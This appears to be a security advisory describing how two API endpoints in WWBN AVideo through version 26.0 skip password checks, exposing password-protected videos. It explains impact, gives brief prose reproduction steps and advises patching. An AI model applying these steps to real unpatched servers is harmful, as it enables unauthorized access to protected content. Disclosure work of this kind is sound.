WWBN AVideo Password Protection Bypass Vulnerability in API Endpoints

A vulnerability exists in WWBN AVideo versions through 26.0, where the `get_api_video_file` and `get_api_video` API endpoints bypass password verification for password-protected videos. This allows unauthenticated users to access direct video playback URLs, including MP4 and HLS sources, without supplying the correct password. The vulnerability arises because the API endpoints do not invoke the necessary password checks, which are enforced in the web playback flow. As a result, any password-protected video can be accessed through the API, undermining the video's security features.

Impact

Exploitation of this vulnerability allows any unauthenticated user to retrieve direct playback URLs for password-protected videos, bypassing the password requirement entirely. This not only enables unauthorized access to the videos but also exposes which videos are password-protected, allowing for targeted enumeration. The vulnerability affects all content accessible through the API, including mobile apps and third-party integrations.

Reproduction

To reproduce this vulnerability, first identify a password-protected video using the video list API. Then, call the `get_api_video_file` or `get_api_video` endpoint for the protected video. The response will include direct playback URLs, which can be used to download the video, bypassing the password requirement.

Remediation

Users are advised to update to the patched version of AVideo, which includes the necessary password verification in the affected API endpoints.